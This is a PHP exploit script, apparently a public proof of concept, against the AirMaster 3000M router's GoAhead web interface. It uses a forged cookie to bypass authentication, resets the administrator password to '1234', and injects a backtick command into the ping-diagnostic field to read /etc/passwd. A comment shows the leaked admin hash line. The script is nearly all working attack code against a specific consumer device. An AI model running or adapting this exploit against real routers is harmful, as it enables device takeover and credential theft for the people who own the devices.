50 lines
No EOL
1.6 KiB
PHP
50 lines
No EOL
1.6 KiB
PHP
<?php
|
|
# Exploit Title: AirMaster 3000M multiple Vulnerabilities
|
|
# Date: 2017/08/12
|
|
# Exploit Author: Koorosh Ghorbani
|
|
# Author Homepage: http://8thbit.net/
|
|
# Vendor Homepage: http://mobinnet.ir/
|
|
# Software Version: V2.0.1B1044
|
|
# Web Server: GoAhead-Webs/2.5.0
|
|
|
|
define('isDebug',false);
|
|
define('specialCookie','Cookie: kz_userid=Administrator:1'); //Special Cookie which allow us to execute commands without authentication
|
|
function changePassword(){
|
|
$pw = "1234"; //New Password
|
|
$data = "admuser=Administrator&admpass=$pw&admConfirmPwd=$pw" ;
|
|
$ch = curl_init('http://192.168.1.1/goform/setSysAdm');
|
|
curl_setopt($ch,CURLOPT_HTTPHEADER,array(
|
|
specialCookie,
|
|
'Origin: http://192.168.1.1',
|
|
'Content-Type: application/x-www-form-urlencoded',
|
|
));
|
|
curl_setopt($ch,CURLOPT_POST,1);
|
|
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
|
|
curl_setopt($ch,CURLOPT_POSTFIELDS,$data);
|
|
$response = curl_exec($ch);
|
|
if($response == "success"){
|
|
echo "New Password is : $pw\r\n";
|
|
}else{
|
|
echo "Failed\r\n";
|
|
}
|
|
if (isDebug){
|
|
echo $response;
|
|
}
|
|
}
|
|
function executeCommand(){
|
|
$data = "pingAddr=`cat /etc/passwd`";
|
|
$ch = curl_init('http://192.168.1.1/goform/startPing');
|
|
curl_setopt($ch,CURLOPT_HTTPHEADER,array(
|
|
specialCookie,
|
|
'Origin: http://192.168.1.1',
|
|
'Content-Type: application/x-www-form-urlencoded',
|
|
"X-Requested-With: XMLHttpRequest",
|
|
"Referer: http://192.168.1.1/diagnosis_ping.asp"
|
|
));
|
|
curl_setopt($ch,CURLOPT_POST,1);
|
|
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
|
|
curl_setopt($ch,CURLOPT_POSTFIELDS,$data);
|
|
$response = curl_exec($ch);
|
|
echo $response; //ping: bad address 'admin:XGUaznXz1ncKw:0:0:Adminstrator:/:/bin/sh'
|
|
}
|
|
changePassword(); |